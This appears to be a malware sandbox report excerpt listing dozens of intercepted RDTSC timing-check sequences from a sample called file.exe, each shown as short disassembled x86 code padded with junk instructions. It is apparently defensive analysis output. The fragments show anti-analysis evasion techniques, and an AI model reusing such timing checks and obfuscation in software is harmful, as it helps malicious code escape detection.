              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD234C second address: AD2352 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD2352 second address: AD23A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+124554FCh], esi 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+1244E2FBh], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FB10CD320F8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 pushad 0x00000035 or eax, dword ptr [ebp+122D2960h] 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23A8 second address: AD23BA instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD23BA second address: AD23C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9D8D second address: AD9DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007FB10CBE4297h 0x0000000b pop edx 0x0000000c jmp 00007FB10CBE4293h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9EEC second address: AD9EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 js 00007FB10CD320F6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9EFB second address: AD9F0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB10CBE428Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9F0D second address: AD9F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007FB10CD320F6h 0x00000014 jmp 00007FB10CD32105h 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007FB10CD320FAh 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA0A0 second address: ADA0BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FB10CBE4292h 0x00000012 jp 00007FB10CBE4286h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF0E8 second address: ADF117 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FB10CD320FAh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB10CD32107h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF1FB second address: ADF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF1FF second address: ADF210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF210 second address: ADF21A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB10CBE4286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0627 second address: AD0632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB10CD320F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE48D8 second address: AE48F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4294h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE48F2 second address: AE48F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4CE3 second address: AE4CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4290h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4CF7 second address: AE4D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB10CD32103h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4D13 second address: AE4D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB10CBE4286h 0x0000000a jmp 00007FB10CBE428Ah 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9707 second address: AE970D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE970D second address: AE9713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF198 second address: A9FF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FCh 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c jmp 00007FB10CD320FBh 0x00000011 pop ebx 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D5596h] 0x00000019 lea eax, dword ptr [ebp+12482F0Bh] 0x0000001f mov dword ptr [ebp+122D17A3h], ebx 0x00000025 nop 0x00000026 ja 00007FB10CD32104h 0x0000002c push eax 0x0000002d jmp 00007FB10CD320FEh 0x00000032 nop 0x00000033 sub edx, dword ptr [ebp+122D2D47h] 0x00000039 call dword ptr [ebp+1245890Dh] 0x0000003f push eax 0x00000040 push edx 0x00000041 jg 00007FB10CD320F8h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7E6 second address: ABF7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7EA second address: ABF7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7F0 second address: ABF7F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABF7F6 second address: ABF7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA56 second address: ABFA5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA5C second address: ABFA89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FB10CD320F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB10CD32100h 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 cmc 0x00000015 mov dword ptr [ebp+122D2FABh], edx 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA89 second address: ABFA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA90 second address: ABFA9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CD320FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC5E second address: ABFC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFC62 second address: ABFC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01D7 second address: AC01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC01DD second address: AC0228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32103h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sbb di, F270h 0x0000000f push 0000001Eh 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FB10CD320F8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b cld 0x0000002c adc edi, 07A324C2h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0228 second address: AC0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB10CBE4286h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0233 second address: AC0239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0239 second address: AC023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC023D second address: AC0262 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FB10CD32100h 0x00000010 jnc 00007FB10CD320F6h 0x00000016 popad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD5CF second address: ACD5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE6EF second address: ACE6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE6F3 second address: ACE701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB10CBE4286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF640 second address: ACF6CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32102h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FB10CD32102h 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D1C2Ch], edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov ebx, 32582368h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jg 00007FB10CD3210Eh 0x00000030 mov eax, dword ptr [ebp+122D0D21h] 0x00000036 mov dword ptr [ebp+122D55C6h], esi 0x0000003c push FFFFFFFFh 0x0000003e jmp 00007FB10CD32109h 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF6CF second address: ACF6D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF6D5 second address: ACF6F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FB10CD3210Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB10CD320FFh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24EB second address: AD24F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB10CBE4286h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24F6 second address: AD24FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD24FB second address: AD255C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sbb bx, 6EB3h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+122D3818h], ecx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov bh, D7h 0x00000027 mov eax, dword ptr [ebp+122D149Dh] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FB10CBE4288h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 movsx ebx, bx 0x0000004a push FFFFFFFFh 0x0000004c and bx, 6352h 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 jo 00007FB10CBE4286h 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push edx 0x0000005e pop edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC053B second address: AC0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB10CD320FEh 0x00000008 jmp 00007FB10CD320FCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007FB10CD32107h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d jmp 00007FB10CD32109h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0596 second address: AC05E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE428Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e js 00007FB10CBE4296h 0x00000014 jmp 00007FB10CBE4290h 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FB10CBE429Fh 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC06F8 second address: AC074D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB10CD320F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D389Eh], edx 0x00000013 lea eax, dword ptr [ebp+12482F0Bh] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FB10CD320F8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov ecx, 19D02D55h 0x00000038 nop 0x00000039 jg 00007FB10CD32100h 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 pop ebx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC074D second address: AA0AE1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push eax 0x00000009 jmp 00007FB10CBE4295h 0x0000000e pop ecx 0x0000000f call dword ptr [ebp+122D3682h] 0x00000015 push edx 0x00000016 jo 00007FB10CBE4288h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FB10CBE4286h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B77 second address: AE8B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B7B second address: AE8B8B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B8B second address: AE8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8B9A second address: AE8BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E99 second address: AE8E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E9E second address: AE8EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8EA6 second address: AE8EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8EAA second address: AE8EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9053 second address: AE9059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9059 second address: AE905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE905D second address: AE9061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9061 second address: AE906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB10CBE4292h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE906F second address: AE9075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD0A second address: AEDD0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD0E second address: AEDD18 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CD320F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD18 second address: AEDD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDD21 second address: AEDD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB10CD320F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007FB10CD320F6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c jng 00007FB10CD320F6h 0x00000022 jmp 00007FB10CD32107h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE030 second address: AEE035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE035 second address: AEE03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE03B second address: AEE047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE73A second address: AEE73E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE73E second address: AEE742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE742 second address: AEE74A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE74A second address: AEE754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FB10CBE4286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE754 second address: AEE758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEB97 second address: AEEBAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED3C second address: AEED42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED42 second address: AEED4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED4C second address: AEED52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEED52 second address: AEED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDA0B second address: AEDA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB10CD32100h 0x0000000a jne 00007FB10CD320F8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007FB10CD32127h 0x00000019 push eax 0x0000001a push edx 0x0000001b jng 00007FB10CD320F6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDA37 second address: AEDA44 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF259E second address: AF25AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF25AA second address: AF25BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FB10CBE4286h 0x00000015 rdtsc
